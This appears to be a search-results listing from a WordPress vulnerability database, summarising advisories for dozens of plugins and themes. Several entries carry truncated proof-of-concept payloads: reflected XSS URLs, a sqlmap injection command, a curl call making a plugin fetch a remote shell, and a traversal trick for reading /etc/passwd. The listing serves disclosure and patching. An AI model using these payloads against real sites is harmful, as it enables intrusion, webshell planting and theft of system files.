14602 matches found
eventr 1.02.2 - Blind SQL Injection
The eventr WordPress plugin was affected by a Blind SQL Injection security vulnerability...
Ultimate Addons for Visual Composer <= 3.16.11 - Authenticated XSS, CSRF, RCE
The UltimateVCAddons WordPress plugin was affected by an Authenticated XSS, CSRF, RCE security vulnerability...
flickr-picture-backup <= 0.7 - Unauthenticated File Upload
The flickr-picture-backup WordPress plugin was affected by an Unauthenticated File Upload security vulnerability...
WP Markdown Editor 2.3.0 - Authenticated "Self" Cross-Site Scripting (XSS)
An Author user could be exploited by use of "self" XSS. This usually requires social engineering and user interaction...
mobile-friendly-app-builder-by-easytouch 3.0 - Unauthenticated File Upload
Plugin is still affected and has been closed...
Magic Fields <= 1.7.1 - Authenticated Cross-Site Scripting (XSS)
The magic-fields WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability...
WP Mail < 1.2 - XSS
The WP Mail WordPress plugin was affected by a XSS security vulnerability...
WassUp Real Time Analytics <= 1.9 - Cross Site Scripting
The WassUp Real Time Analytics WordPress plugin was affected by a Cross Site Scripting security vulnerability...
Activity Log <= 2.3.2 - Cross-Site Scripting (XSS)
The Activity Log WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability...
Yoast SEO <= 3.4.0 - Authenticated Stored Cross-Site Scripting (XSS)
The changelog reads: "Fixes a stored XSS issue in the Yoast SEO metabox. Thanks Hammad Shamsi for reporting and responsibly disclosing this issue."...
WP Google Map Plugin < 3.1.2 - XSS
The WP Google Map Plugin WordPress plugin was affected by a XSS security vulnerability...
Profile Builder < 2.4.2 - Reflected Cross-Site Scripting (XSS)
The User Registration & User Profile – Profile Builder WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability...
Activity Log <= 2.3.1 - Stored Cross-Site Scripting (XSS)
The Activity Log WordPress plugin was affected by a Stored Cross-Site Scripting XSS security vulnerability...
WP Live Chat Support < 6.2.02 - Stored Cross-Site Scripting
The 3CX Live Chat WordPress plugin was affected by a Stored Cross-Site Scripting security vulnerability...
Jetpack 2.0-4.0.2 - Shortcode Stored Cross-Site Scripting (XSS)
The Jetpack – WP Security, Backup, Speed, & Growth WordPress plugin was affected by a Shortcode Stored Cross-Site Scripting XSS security vulnerability...
brafton WordPress Plugin <=3.4.7 - Reflected XSS
Title -brafton WordPress Plugin XSS Exploit Title : Vulnerabilitie XSS in brafton WordPress Plugin Date: Fri May 20 2016 Reported Date : Fri May 20 2016 Vendor Homepage: http://www.brafton.com/support/wordpress/ Version: v3.3.10 – January2016 Software Link:...
Tera Charts 1.0 - Unauthenticated Cross-Site Scripting (XSS)
The tera-charts WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. PoC http://www.example.com/tera-charts/charts/treemap.php?fn=";alert1;...
Ghost Plugin <= 0.5.5 - Unrestricted Export Download
The Ghost WordPress plugin was affected by an Unrestricted Export Download security vulnerability...
Truemag Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
The truemag WordPress theme was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. PoC http://WP/?s="%20...
Tweet Wheel <= 1.0.3.2 - Reflected Cross-Site Scripting (XSS)
The Tweet Wheel WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability...
HDW WordPress Video Gallery <= 1.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The hdw-tube WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. PoC http://www.example.com/wp-content/plugins/hdw-tube/playlist.php?playlist=""...
Hero Maps Pro <= 2.1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The hero-maps-pro WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. PoC http://www.example.com/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=""...
anti-plagiarism <= 3.60 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The anti-plagiarism WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. PoC http://www.example.com/wp-content/plugins/anti-plagiarism/js.php?m=""...
OptinMonster <= 1.1.4.5 - Execution of Arbitrary Shortcodes
Unauthenticated users are able to execute arbitrary WordPress shortcodes via a simple HTTP GET request. While the command is protected by a nonce, the nonce is leaked on every page load...
Users Ultra Membership Plugin <= 1.5.63 - Authenticated Blind SQL Injection
The Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability...
Users Ultra Membership Plugin <= 1.5.58 - Unrestricted File Upload
The Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin WordPress plugin was affected by an Unrestricted File Upload security vulnerability...
ResAds <= 1.0.1 - Reflected Cross-Site Scripting (XSS)
The ResAds WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability...
Appointment Booking Calendar < 1.1.8 - Multiple Reflected Cross-Site Scripting (XSS) and SQL Injection
The Appointment Booking Calendar WordPress plugin was affected by a Multiple Reflected Cross-Site Scripting XSS and SQL Injection security vulnerability...
Csv2WPeC Coupon <= 1.1 - Unauthenticated Remote File Upload
The code in csv2wpecCouponFileUpload.php does not properly sanitize user input, it checks the file mime-type for type x-php but this can be tricked when using the short code for PoC "; $uploadfile="/var/www/s.pht"; $ch =...
Simple Fields <= 1.4.10 - Authenticated Reflected Cross-Site Scripting (XSS)
The Simple Fields WordPress plugin was affected by an Authenticated Reflected Cross-Site Scripting XSS security vulnerability...
Alpine PhotoTile for Instagram <= 1.2.7.5 - Authenticated Cross-Site Scripting (XSS)
The alpine-photo-tile-for-instagram WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability...
Unite Gallery Lite <= 1.4.6 - CSRF & Authenticated SQL Injection
The Unite Gallery Lite WordPress plugin was affected by a CSRF & Authenticated SQL Injection security vulnerability...
Fast Image Adder <= 1.1 - Unauthenticated Remote File Upload
The fast-image-adder WordPress plugin was affected by an Unauthenticated Remote File Upload security vulnerability. PoC $ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url=http://sitewithshellstodl/shell.php Shell location is reported back t...
WP e-Commerce Shop Styling <= 2.5 - Local File Inclusion
The code in ./wp-ecommerce-shop-styling/includes/download.php does not sanitise user input to prevent sensitive system files from being downloaded. You'll have to rename the download file via mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd as the filename is set to the download filename with pat...
Broken Link Checker <= 1.10.8 - Unauthenticated Stored XSS
Persistent Cross-Site Scripting XSS in wordpress-admin-panel enabled by not proper sanitised HTTP headers...
Erident Custom Login & Dashboard 3.4-3.4.1 - Stored Cross-Site Scripting (XSS)
The Erident Custom Login and Dashboard plugin exposes a call to the updateoption method, when a specific POST field is posted to the plugins setting screen. No CSRF token is used, and as such if an Administrative user can be tricked into visiting a site with a malicious form, it is possible to...
Easy2Map Photos <= 1.0.9 - SQL Injection
The code in Functions.php is vulnerable to SQL Injection because they are not parameterising or sanitising user input. PoC sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php' --data="mapID=11='+or+1%3D%3D1%3B=e2mimgsavemapname" --cookie=COOKIEHERE --level=5 --risk=3...
Estrutura-Basica - Local File Download
The estrutura-basica WordPress theme was affected by a Local File Download security vulnerability...
WP Symposium <= 15.1 - SQL Injection
The wp-symposium WordPress plugin was affected by a SQL Injection security vulnerability...
All in One SEO Pack <= 2.2.5.1 - Information Disclosure
The Semper Fi All in One SEO Pack plugin before 2.2.6 for WordPress does not consider the presence of password protection during generation of the Meta Description field, which allows remote attackers to obtain sensitive information by reading HTML source code...
Facebook (spider-facebook) <= 1.0.10 - Cross-Site Scripting (XSS)
The WDSocialWidgets WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability...
EasyCart <= 3.0.15 - Unrestricted File Upload
In versions = 3.0.8 this can be exploited by authenticating as any WordPress user, and in versions 3.0.9 - 3.0.15 can be exploited by passing a valid password hash being used by any admin in the EasyCart user system...
Pie Register <= 2.0.13 - Privilege escalation
The Pie Register – User Registration Forms. Invitation based registrations, Custom Login, Payments WordPress plugin was affected by a Privilege escalation security vulnerability...
CM Download Manager < 2.0.7 - CSRF to Cross-Site Scripting
The lack of CSRF check and sanitisation could allow attackers to perform CSRF attacks against logged in administrators, and set a Cross-Site Scripting payload via addonstitle parameter in the CMDMadminsettings page...
Our Team Showcase 1.2 - CSRF & XSS
The Our Team Showcase WordPress plugin was affected by a CSRF & XSS security vulnerability...
O2tweet <= 0.0.4 - Multiple CSRF
Plugin is still affected and has been closed...
Cardoza Facebook Like Box < 2.8.3 - Multiple CSRF
The Easy Social Like Box – Popup – Sidebar Widget WordPress plugin was affected by a Multiple CSRF security vulnerability...
Simple Ip Ban <= 1.2.3 - Multiple CSRF
The IP Ban WordPress plugin was affected by a Multiple CSRF security vulnerability...
Simple Visitor Stat <= 1.0 - Multiple XSS
Plugin is still affected and has been closed...
Ninja Forms <= 2.8.9 - Unspecified Issue Affecting Admin Users
This version includes a fix for a potential security vulnerability for admin users...